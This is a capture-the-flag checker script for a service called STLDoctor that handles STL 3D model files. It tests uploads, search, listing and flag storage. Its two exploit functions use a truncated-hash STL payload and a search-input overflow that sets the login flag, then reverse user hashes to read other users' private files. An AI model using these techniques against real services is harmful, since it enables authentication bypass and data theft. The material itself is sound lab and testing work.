#!/usr/bin/env python3 import logging, math, os, random, re, socket, string, struct, subprocess, selectors, time import numpy as np logging.getLogger("faker").setLevel(logging.WARNING) logging.getLogger("_curses").setLevel(logging.CRITICAL) from enochecker3 import * from enochecker3.utils import * from faker import Faker from io import BytesIO from stl import mesh from typing import ( Any, Optional, Tuple, Union ) from logging import LoggerAdapter from asyncio import StreamReader, StreamWriter rand = random.SystemRandom() generic_alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789-+.!" script_path = os.path.dirname(os.path.realpath(__file__)) models_path = f"{script_path}/models" extra_models = [f"{models_path}/{path}" for path in os.listdir(models_path) if path.endswith(".stl")] prompt = b"\r$ " search_truncation_payload = b""" solid test\xff facet normal 0 0 1.0 outer loop vertex 1 0 0 vertex 1 1 0 vertex 0 1 0 endloop endfacet endsolid test\xff """ checker = Enochecker("STLDoctor", 9090) app = lambda: checker.app class Session: def __init__(self, socket: AsyncSocket) -> None: self.reader: StreamReader = socket[0] self.writer: StreamWriter = socket[1] self.writer._write = self.writer.write self.writer.write = Session.write.__get__(self.writer) self.reader._readuntil = self.reader.readuntil self.reader.readuntil = Session.readuntil.__get__(self.reader) def write(self: StreamWriter, data: Union[str, bytes]) -> None: self._write(ensure_bytes(data)) def readuntil(self: StreamReader, data: Union[str, bytes]) -> bytes: return self._readuntil(ensure_bytes(data)) async def __atexit__(self) -> None: await self.close() async def prepare(self) -> None: await self.reader.readuntil(prompt) async def close(self) -> None: self.writer.write("exit\n") await self.writer.drain() await self.reader.readuntil("bye!") # ensure clean exit self.writer.close() await self.writer.wait_closed() @checker.register_dependency def _get_session(socket: AsyncSocket) -> Session: return Session(socket) def ensure_bytes(v: Union[str,bytes]) -> bytes: if type(v) == bytes: return v elif type(v) == str: return v.encode() else: raise InternalErrorException("Tried to pass non str/bytes to bytes arg") def includes_all(resp: bytes, targets: Tuple[bytes, ...]) -> bool: for m in targets: if ensure_bytes(m) not in resp: return False return True def includes_any(resp: bytes, targets: Tuple[bytes, ...]) -> bool: for m in targets: if ensure_bytes(m) in resp: return True return False def fakeid(havoc = False) -> bytes: if havoc: idlen = rand.randint(10, 40) return bytes([rand.randint(32, 127) for i in range(idlen)]) else: fake = Faker(["en_US"]) idstr = bytes([ord(c) for c in fake.name().replace(" ","") if c in generic_alphabet][:12]).ljust(10, b".") idstr += bytes([ord(rand.choice(generic_alphabet)) for i in range(8)]) return idstr def fakeids(n: int, **kwargs) -> Tuple[bytes, ...]: return [fakeid(**kwargs) for i in range(n)] def approx_equal(f1: float, f2: float, precision: int = 2) -> bool: return round(f1, precision) == round(f2, precision) def reverse_hash(hashstr: Union[str, bytes]): if type(hashstr) is bytes: hashstr = hashstr.decode() data = subprocess.check_output([f"{script_path}/revhash/revhash", hashstr])[:-1] if data == b"": raise InternalErrorException(f"Failed to find hash preimage of {hashstr}") return data def parse_int(intstr: Union[str, bytes]) -> Optional[int]: try: return int(intstr) except: return None def parse_float(floatstr: Union[str, bytes]) -> Optional[float]: try: return float(floatstr) except: return None def has_alph(data: Union[str, bytes], alph: Union[str, bytes]) -> bool: return len([v for v in data if v not in alph]) == 0 def assert_match(data: bytes, pattern: bytes, exception: Exception) -> bytes: rem = re.search(pattern, data) if rem is None: raise exception(f"Expected pattern {pattern} to match {data}") if len(rem.groups()) > 0: return rem.group(1) return rem.group(0) def genfile_ascii(solidname: str, malformed: bool = None) -> bytes: indent = bytes([rand.choice(b"\t ") for i in range(rand.randint(1, 4))]) solidname = ensure_bytes(solidname) facet_count = rand.randint(4, 30) if len(solidname) != 0: content = b"solid " + solidname + b"\n" else: content = b"solid\n" for fi in range(facet_count): # MALFORM 1: wrong keyword if malformed == 1: content += indent * 1 + b"facet nornal " else: content += indent * 1 + b"facet normal " vs = [[rand.random() for i in range(3)] for k in range(3)] norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2],vs[0])) norm = norm / np.linalg.norm(norm) content += " ".join([f"{v:.2f}" for v in norm]).encode() + b"\n" # MALFORM 2: wrong keyword case if malformed == 2: content += indent * 2 + b"outer lOop\n" else: content += indent * 2 + b"outer loop\n" for i in range(3): content += indent * 3 + b"vertex " + " ".join([f"{v:.2f}" for v in vs[i]]).encode() + b"\n" content += indent * 2 + b"endloop\n" content += indent + b"endfacet\n" # MALFORM 3: no endsolid keyword if malformed != 3: if solidname != b"": content += b"endsolid " + solidname + b"\n" else: content += b"endsolid\n" return content def genfile_bin(solidname: bytes, malformed: bool = None) -> bytes: solidname = ensure_bytes(solidname) facet_count = rand.randint(4, 30) if len(solidname) > 78: raise InternalErrorException("Solidname to embed in header is larger than header itself") if solidname != "": content = b"#" + solidname.ljust(78, b"\x00") + b"\x00" else: content = b"#" + b"\x00" * 79 # MALFORM 1: specify more facets than are in the file if malformed == 1: content += struct.pack(" bytes: if filetype == "ascii": return genfile_ascii(solidname, malformed = malformed) elif filetype == "bin": return genfile_bin(solidname, malformed = malformed) elif filetype == "garbage-tiny": return bytes([ord(rand.choice(generic_alphabet)) for i in range(rand.randint(3, 8))]) elif filetype == "garbage": return bytes([ord(rand.choice(generic_alphabet)) for i in range(rand.randint(100, 300))]) else: raise InternalErrorException("Invalid file type supplied") def parse_stlinfo(stlfile: bytes) -> Any: fakefile = BytesIO() fakefile.write(stlfile) fakefile.seek(0) try: name, data = mesh.Mesh.load(fakefile) meshinfo = mesh.Mesh(data, True, name=name, speedups=True) except Exception as e: raise InternalErrorException(f"Unable to parse generated STL file: {e}") bmin = [math.inf for i in range(3)] bmax = [-math.inf for i in range(3)] if len(meshinfo.points) == 0: raise InternalErrorException("Parsed STL mesh has 0 points!") for p in meshinfo.points: for k in range(3): for i in range(3): bmin[k] = min(bmin[k], float(p[3*i+k])) bmax[k] = max(bmax[k], float(p[3*i+k])) info = { "points": meshinfo.points, "bb_origin": bmin, "bb_size": [bmax[i] - bmin[i] for i in range(3)], "size": len(stlfile), "triangle_count": len(meshinfo.points) } return info async def getdb(db: ChainDB, key: str) -> Tuple[Any, ...]: try: return await db.get(key) except KeyError: raise MumbleException("Could not retrieve necessary info for service interaction") # SERVICE FUNCTIONS # async def do_auth(session: Session, logger: LoggerAdapter, authstr: bytes, check: bool = True) -> Optional[bytes]: authstr = ensure_bytes(authstr) logger.debug(f"Logging in with {authstr}") session.writer.write("auth\n") session.writer.write(authstr + b"\n") await session.writer.drain() # Check for errors resp = await session.reader.readline() if b"ERR:" in resp: if check: logger.critical(f"Failed to login with {authstr}:\n{resp}") raise MumbleException("Authentication not working properly") return None # Also check success message resp += await session.reader.readuntil(prompt) if b"Success!" not in resp: logger.critical(f"Login with pass {authstr} failed") raise MumbleException("Authentication not working properly") return b"Welcome back" in resp async def do_list(session: Session, logger: LoggerAdapter, check: bool = True) -> Optional[bytes]: session.writer.write("list\n") await session.writer.drain() resp = await session.reader.readuntil(prompt) # Check for errors if b"ERR:" in resp and b">> " not in resp: if check: logger.critical(f"Failed to list private files:\n{resp}") raise MumbleException("File listing not working properly") return None return resp async def do_upload(session: Session, logger: LoggerAdapter, modelname: str, stlfile: str, check: bool = True) -> Optional[bytes]: modelname = ensure_bytes(modelname) # Upload file logger.debug(f"Uploading model with name {modelname}") session.writer.write("upload\n") session.writer.write(modelname + b"\n") session.writer.write(f"{len(stlfile)}\n") session.writer.write(stlfile) await session.writer.drain() # Check for errors # TODO improve by reading responses separately resp = await session.reader.readline() resp += await session.reader.readline() if b"ERR:" in resp: if check: logger.critical(f"Failed to upload model {modelname}:\n{resp}") raise MumbleException("File upload not working properly") await session.reader.readuntil(prompt) return None # Parse ID try: modelid = resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1] if modelid == b"": raise Exception except: logger.critical(f"Invalid response during upload of {modelname}:\n{resp}") raise MumbleException("File upload not working properly") await session.reader.readuntil(prompt) return modelid async def do_search(session, logger, modelname, download = False, check = True) -> Optional[Tuple[bytes, bytes]]: modelname = ensure_bytes(modelname) # Initiate download logger.debug(f"Retrieving model with name {modelname}") session.writer.write(b"search " + modelname + b"\n") session.writer.write("0\n") # first result session.writer.write("y\n" if download else "n\n") session.writer.write("q\n") # quit await session.writer.drain() # Check if an error occured line = await session.reader.readline() if b"ERR:" in line: if check: logger.critical(f"Failed to retrieve model {modelname}:\n{line}") raise MumbleException("File search not working properly") if b"Couldn't find a matching scan result" in line: # collect all the invalid commands sent after (hacky) # TODO: improve by checking every response in search await session.reader.readuntil(prompt) await session.reader.readuntil(prompt) await session.reader.readuntil(prompt) await session.reader.readuntil(prompt) return None # read until end of info box fileinfo = line + await session.reader.readuntil("================== \n") stlfile = b"" if download: # Parse file contents await session.reader.readuntil(b"Here you go.. (") resp = await session.reader.readuntil(b"B)\n") resp = resp[:-3] size = parse_int(resp) if size is None: raise MumbleException(f"Received invalid download size, response:\n{resp}") logger.debug(f"Download size: {size}") stlfile = await session.reader.readexactly(size) await session.reader.readuntil(prompt) return fileinfo, stlfile # CHECK WRAPPERS # async def check_line(session: Session, logger: LoggerAdapter, context: str): line = session.reader.readline() if b"ERR:" in line: logger.critical(f"{context}: Unexpected error message\n") raise MumbleException("Service returned error during valid interaction") return line async def check_listed(session: Session, logger: LoggerAdapter, includes: Tuple[bytes, ...]) -> bytes: resp = await do_list(session, logger, check = True) if not includes_all(resp, includes): logger.critical(f"Failed to find {includes} in listing:\n{resp}") raise MumbleException("File listing not working properly") return resp async def check_not_listed(session: Session, logger: LoggerAdapter, excludes: Tuple[bytes, ...], fail: bool = False) -> bytes: resp = await do_list(session, logger, check = False) if fail and resp: logger.critical(f"Expected list to fail, but returned:\n{resp}") raise MumbleException("File listing not working properly") if not fail and not resp: logger.critical(f"List failed unexpectedly:\n{resp}") raise MumbleException("File listing not working properly") if resp and includes_any(resp, excludes): logger.critical(f"Unexpectedly found one of {excludes} in listing:\n{resp}") raise MumbleException("File listing not working properly") return resp async def check_in_search(session: Session, logger: LoggerAdapter, modelname: bytes, includes: Tuple[bytes], download: bool = False) -> Tuple[bytes, bytes]: info, stlfile = await do_search(session, logger, modelname, download, check = True) if not includes_all(info + stlfile, includes): logger.critical(f"Retrieved info for {modelname} is missing {includes}: {resp}") raise MumbleException("File search not working properly") return info, stlfile async def check_not_in_search(session: Session, logger: LoggerAdapter, modelname: bytes, excludes: Tuple[bytes], download: bool = False, fail: bool = False) -> Tuple[bytes, bytes]: resp = await do_search(session, logger, modelname, download, check = False) if resp: combined = resp[0] + resp[1] if fail and resp: logger.critical("Search for {modelname} succeeded unexpectedly:\n{combined}") raise MumbleException("File search not working properly") if not fail and not resp: logger.critical(f"Search for {modelname} failed unexpectedly") raise MumbleException("File search not working properly") if resp and includes_any(combined, excludes): logger.critical(f"Unexpectedly {modelname} info contains one of {includes}: {combined}") raise MumbleException("File search not working properly") return resp def check_hash(hashstr: bytes) -> None: if not has_alph(hashstr, b"0123456789abcdef"): raise MumbleException("Invalid model hash format returned") def check_stlinfo(logger: LoggerAdapter, resp: bytes, ref_info: Any, ref_modelid: Optional[bytes] = None, ref_modelname: Optional[bytes] = None, ref_solidname: Optional[bytes] = None) -> None: def logthrow(msg): logger.critical(msg) raise MumbleException("STL parsing not working properly") size = parse_int(assert_match(resp, b"File Size: (.*)\n", MumbleException)) if not size or size != ref_info["size"]: logthrow(f"STL info returned no / invalid file size: {size} != {ref_info['size']}") triangle_count = parse_int(assert_match(resp, b"Triangle Count: (.*)\n", MumbleException)) if not triangle_count or triangle_count != ref_info["triangle_count"]: logthrow(f"STL info returned no / invalid triangle count: {triangle_count} != {ref_info['triangle_count']}") bb_size_str = assert_match(resp, b"Bounding Box Size: (.*)\n", MumbleException) bb_size = [parse_float(v) for v in bb_size_str.split(b" x ")] if None in bb_size: logthrow(f"STL info returned invalid bounding box size: {bb_size_str}") if False in [approx_equal(bb_size[i], ref_info["bb_size"][i]) for i in range(3)]: logthrow(f"Bounding box size doesnt match: (REF) {ref_info['bb_size']} {bb_size}") bb_origin_str = assert_match(resp, b"Bounding Box Origin: (.*)\n", MumbleException) bb_origin = [parse_float(v) for v in bb_origin_str.split(b" x ")] if None in bb_origin: logthrow(f"STL info returned invalid bounding box origin: {bb_origin_str}") if False in [approx_equal(bb_origin[i], ref_info["bb_origin"][i]) for i in range(3)]: logthrow(f"Bounding box origin doesnt match: (REF) {ref_info['bb_origin']} {bb_origin}") triangle_count = parse_float(assert_match(resp, b"Triangle Count: (.*)\n", MumbleException)) if triangle_count is None or triangle_count != ref_info["triangle_count"]: logthrow(f"Triangle count {triangle_count} doesnt match expected: {ref_info['triangle_count']}") if ref_modelname: modelname = assert_match(resp, b"Model Name: (.*)\n", MumbleException) if modelname != ref_modelname: logthrow(f"Got modelname {modelname}, expected {ref_modelname}") if ref_modelid: modelid = assert_match(resp, b"Model ID: (.*)\n", MumbleException) if modelid != ref_modelid: logthrow(f"Got modelid {modelid}, expected {ref_modelid}") if ref_solidname: solidname = assert_match(resp, b"Solid Name: (.*)\n", MumbleException) if solidname != ref_solidname: logthrow(f"Got solidname {solidname}, expected {ref_solidname}") # TEST METHODS # async def test_good_upload(di: DependencyInjector, filetype: str, register: str) -> None: solidname = fakeid(havoc = (filetype == "bin")) # ascii stl cant handle havoc modelname, authstr = fakeids(2, havoc = True) stlfile = genfile(solidname, filetype) ref_info = parse_stlinfo(stlfile) logger = await di.get(LoggerAdapter) # Create new session, register and upload file session = await di.get(Session) await session.prepare() if register: await do_auth(session, logger, authstr) modelid = await do_upload(session, logger, modelname, stlfile) check_hash(modelid) expected = [modelname, solidname, stlfile, modelid] info, stlfile = await check_in_search(session, logger, modelname, expected, download = True) check_stlinfo(logger, info, ref_info, ref_modelname = modelname, ref_modelid = modelid, ref_solidname = solidname) if register: resp = await check_listed(session, logger, [modelname, modelid + b"-"]) await session.close() # Try getting file from a new session session = await di.get(Session) await session.prepare() if register: await check_not_in_search(session, logger, modelname, expected, download = True, fail = True) await do_auth(session, logger, authstr) info, stlfile = await check_in_search(session, logger, modelname, expected, download = True) check_stlinfo(logger, info, ref_info, ref_modelname = modelname, ref_modelid = modelid, ref_solidname = solidname) await check_listed(session, logger, [modelname, modelid + b"-"]) else: info, stlfile = await check_in_search(session, logger, modelname, expected, download = True) check_stlinfo(logger, info, ref_info, ref_modelname = modelname, ref_modelid = modelid, ref_solidname = solidname) await session.close() async def test_bad_upload(di: DependencyInjector, filetype: str, variant: int) -> None: modelname, solidname = fakeids(2) stlfile = genfile(solidname, filetype, malformed = variant) logger = await di.get(LoggerAdapter) # Ensure a malformed file causes an error session = await di.get(Session) await session.prepare() if await do_upload(session, logger, modelname, stlfile, check = False): logger.critical(f"Able to upload malformed file:\n{stlfile}") raise MumbleException("Upload validation not working properly") await session.close() async def test_search(di: DependencyInjector, registered = False) -> None: solidname, modelname, authstr = fakeids(3) stlfile = genfile(solidname, "bin") logger = await di.get(LoggerAdapter) # Ensure searching for a file that doesnt exist causes an error session = await di.get(Session) await session.prepare() if registered: await do_auth(session, logger, authstr) if await do_search(session, logger, modelname, download = False, check = None): logger.critical(f"Search for file that shouldn't exist returned a file:\n{resp}") raise MumbleException("File search not working properly") await session.close() async def test_list(di: DependencyInjector, registered = False) -> None: solidname, modelname, authstr, authstr2 = fakeids(4) stlfile = genfile(solidname, "bin") logger = await di.get(LoggerAdapter) if registered: # Create a session and upload a file session = await di.get(Session) await session.prepare() await do_auth(session, logger, authstr) modelid = await do_upload(session, logger, modelname, stlfile) await check_listed(session, logger, [modelname, modelid + b"-"]) await session.close() # Ensure that list for another user does not return first users files session = await di.get(Session) await session.prepare() if await do_auth(session, logger, authstr2): logger.critical("New authstr {authstr2} already has a user dir! Hash collision?!") raise MumbleException("User authentication not working properly") await check_not_listed(session, logger, [modelid, modelname]) await session.close() else: # Ensure that list does not work for unregistered users session = await di.get(Session) await session.prepare() if await do_list(session, logger, check = False): logger.critical("Unregistered user can run list without ERR!") raise MumbleException("User authentication not working properly") await session.close() # CHECKER METHODS # @checker.putflag(0) async def putflag_guest(task: PutflagCheckerTaskMessage, di: DependencyInjector) -> None: modelname: bytes = fakeid() logger: LoggerAdapter = await di.get(LoggerAdapter) db: ChainDB = await di.get(ChainDB) session: Session = await di.get(Session) await session.prepare() stlfile: bytes = genfile(task.flag, "ascii") modelid: bytes = await do_upload(session, logger, modelname, stlfile) await session.close() await db.set("flag-0-info", (modelname, modelid)) @checker.putflag(1) async def putflag_private(task: PutflagCheckerTaskMessage, di: DependencyInjector) -> None: modelname, authstr = fakeids(2) stlfile: bytes = genfile(task.flag, "bin") logger: LoggerAdapter = await di.get(LoggerAdapter) db: ChainDB = await di.get(ChainDB) session: Session = await di.get(Session) await session.prepare() await do_auth(session, logger, authstr) modelid: bytes = await do_upload(session, logger, modelname, stlfile) await session.close() await db.set("flag-1-info", (modelname, modelid, authstr)) @checker.getflag(0) async def getflag_guest(task: GetflagCheckerTaskMessage, di: DependencyInjector) -> None: db: ChainDB = await di.get(ChainDB) modelname, modelid = await getdb(db, "flag-0-info") logger: LoggerAdapter = await di.get(LoggerAdapter) session: Session = await di.get(Session) await session.prepare() stlinfo, stlfile = await do_search(session, logger, modelname, download = True) assert_in(task.flag.encode(), stlinfo, "Flag is missing from stl info") assert_in(task.flag.encode(), stlfile, "Flag is missing from stl file") await session.close() @checker.getflag(1) async def getflag_private(task: GetflagCheckerTaskMessage, di: DependencyInjector) -> None: db: ChainDB = await di.get(ChainDB) modelname, modelid, authstr = await getdb(db, "flag-1-info") logger = await di.get(LoggerAdapter) session = await di.get(Session) await session.prepare() await do_auth(session, logger, authstr) stlinfo, stlfile = await do_search(session, logger, modelname, download = True) assert_in(task.flag.encode(), stlinfo, "Flag is missing from stl info") assert_in(task.flag.encode(), stlfile, "Flag is missing from stl file") resp = await do_list(session, logger) assert_in(task.flag.encode(), resp, "Flag is missing from list") await session.close() @checker.putnoise(0, 1) async def putnoise_guest_ascii(task: PutnoiseCheckerTaskMessage, di: DependencyInjector) -> None: modelname, solidname = fakeids(2) logger: LoggerAdapter = await di.get(LoggerAdapter) db: ChainDB = await di.get(ChainDB) session: Session = await di.get(Session) await session.prepare() stlfile = genfile(solidname, "ascii" if task.variant_id == 0 else "bin") modelid = await do_upload(session, logger, modelname, stlfile) await session.close() await db.set(f"noise-{task.variant_id}-info", (modelid, modelname, solidname, stlfile)) @checker.putnoise(2, 3) async def putnoise_priv_ascii(task: PutnoiseCheckerTaskMessage, di: DependencyInjector) -> None: modelname, solidname, authstr = fakeids(3) logger: LoggerAdapter = await di.get(LoggerAdapter) db: ChainDB = await di.get(ChainDB) session: Session = await di.get(Session) await session.prepare() stlfile = genfile(solidname, "ascii" if task.variant_id == 0 else "bin") await do_auth(session, logger, authstr) modelid = await do_upload(session, logger, modelname, stlfile) await session.close() await db.set(f"noise-{task.variant_id}-info", (modelid, modelname, solidname, stlfile, authstr)) @checker.getnoise(0, 1) async def getnoise_guest_ascii(task: GetnoiseCheckerTaskMessage, di: DependencyInjector) -> None: db: ChainDB = await di.get(ChainDB) modelid, modelname, solidname, stlfile = await getdb(db, f"noise-{task.variant_id}-info") logger: LoggerAdapter = await di.get(LoggerAdapter) session: Session = await di.get(Session) await session.prepare() await check_in_search(session, logger, modelname, [modelname, solidname, stlfile, modelid], download = True) await session.close() @checker.getnoise(2, 3) async def getnoise_priv_ascii(task: GetnoiseCheckerTaskMessage, di: DependencyInjector) -> None: db: ChainDB = await di.get(ChainDB) modelid, modelname, solidname, stlfile, authstr = await getdb(db, f"noise-{task.variant_id}-info") logger: LoggerAdapter = await di.get(LoggerAdapter) session: Session = await di.get(Session) await session.prepare() await do_auth(session, logger, authstr) await check_in_search(session, logger, modelname, [modelname, solidname, stlfile, modelid], download = True) await session.close() @checker.havoc(*range(0, 4)) async def havoc_good_upload(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None: filetype = ["ascii", "bin", "ascii", "bin"] registered = [False, False, True, True] await test_good_upload(di, filetype[task.variant_id], registered[task.variant_id]) @checker.havoc(*range(4, 12)) async def havoc_bad_upload(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None: filetype = ["ascii", "ascii", "ascii", "bin", "bin", "bin", "garbage", "garbage-tiny"] upload_variant = [1, 2, 3, 1, 2, 3, 1, 1] await test_bad_upload(di, filetype[task.variant_id - 4], upload_variant[task.variant_id - 4]) @checker.havoc(12, 13) async def havoc_test_search(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None: await test_search(di, task.variant_id == 12) @checker.havoc(14, 15) async def havoc_test_list(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None: await test_list(di, task.variant_id == 14) @checker.havoc(16) async def havoc_fluff_upload(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None: if len(extra_models) == 0: return model = rand.choice(extra_models) modelname = os.path.basename(model).split("-")[0] modelname += "".join([rand.choice("0123456789") for i in range(5)]) stlfile = open(model, "rb").read() logger = await di.get(LoggerAdapter) session = await di.get(Session) await session.prepare() modelid = await do_upload(session, logger, modelname, stlfile) await check_in_search(session, logger, modelname, [modelname, modelid, stlfile], download = True) @checker.exploit(0) async def exploit_prefix_truncation(di: DependencyInjector): modelname = fakeid() logger = await di.get(LoggerAdapter) searcher = await di.get(FlagSearcher) # Upload evil file for parse via search for hash truncation session = await di.get(Session) await session.prepare() logger.debug(f"Uploading evil file for hash truncation") modelid = await do_upload(session, logger, modelname, stlfile = search_truncation_payload) info, contents = await do_search(session, logger, modelname, download = False) session.writer.write("search last\n") await session.writer.drain() resp = await session.reader.readuntil("? ") filelist = [l.strip().split(b" : ")[1] for l in resp.split(b"\n") if b" : " in l] if len(filelist) == 0: raise MumbleException("Failed to list files through search") # Use it to enumerate other files and grab contents logger.debug("Targets:\n" + "\n".join([" - " + l.decode("latin1") for l in filelist])) for i, fhash in enumerate(filelist): logger.debug(f"Retrieving file {fhash} at index {i}") session.writer.write(f"{i}\nn\n") await session.writer.drain() resp = await session.reader.readuntil("==================") resp += await session.reader.readuntil("? ") if flag := searcher.search_flag(resp.decode("latin1")): return flag # Done! session.writer.write("q\n") await session.writer.drain() await session.reader.readuntil(prompt) await session.close() raise MumbleException("Exploit for flagstore 1 failed") @checker.exploit(1) async def exploit_hash_overflow(di: DependencyInjector) -> None: logger = await di.get(LoggerAdapter) searcher = await di.get(FlagSearcher) # Overflow loggedin variable session = await di.get(Session) await session.prepare() session.writer.write(b"search \xff\xff\xff\xff\xff0000000000000000\n") await session.writer.drain() await session.reader.readuntil(prompt) session.writer.write("auth\n") await session.writer.drain() resp = await session.reader.readuntil(prompt) if b"Already logged in!" not in resp: raise MumbleException("Exploit did not set 'loggedin' variable via overflow") # Get private user hashes via 'list' resp = await do_list(session, logger, check=False) if not resp: raise MumbleException("") logger.debug("List response: " + str(resp)) users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l] await session.close() # Login as each private user for userhash in users: # Find preimage of user hash logger.debug(f"Logging in as user with id {userhash}") authstr = reverse_hash(userhash) # Authenticate and check if the user is new session = await di.get(Session) await session.prepare() if not await do_auth(session, logger, authstr): await session.close() # We dont raise an exception, because it could be that user dir was cleaned # up just before we logged in, not necessarily because of an invalid prehash. # If there was a problem with the preimage generation, we wont find a flag and # an exception will be raised later anways... continue # List all private files of user resp = await do_list(session, logger) await session.close() # Search for flag in solid names solidnames = b"\n".join([l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l]) if flag := searcher.search_flag(solidnames.decode("latin1")): return flag raise MumbleException("Exploit for flagstore 2 failed") if __name__ == "__main__": checker.run(port = 9091)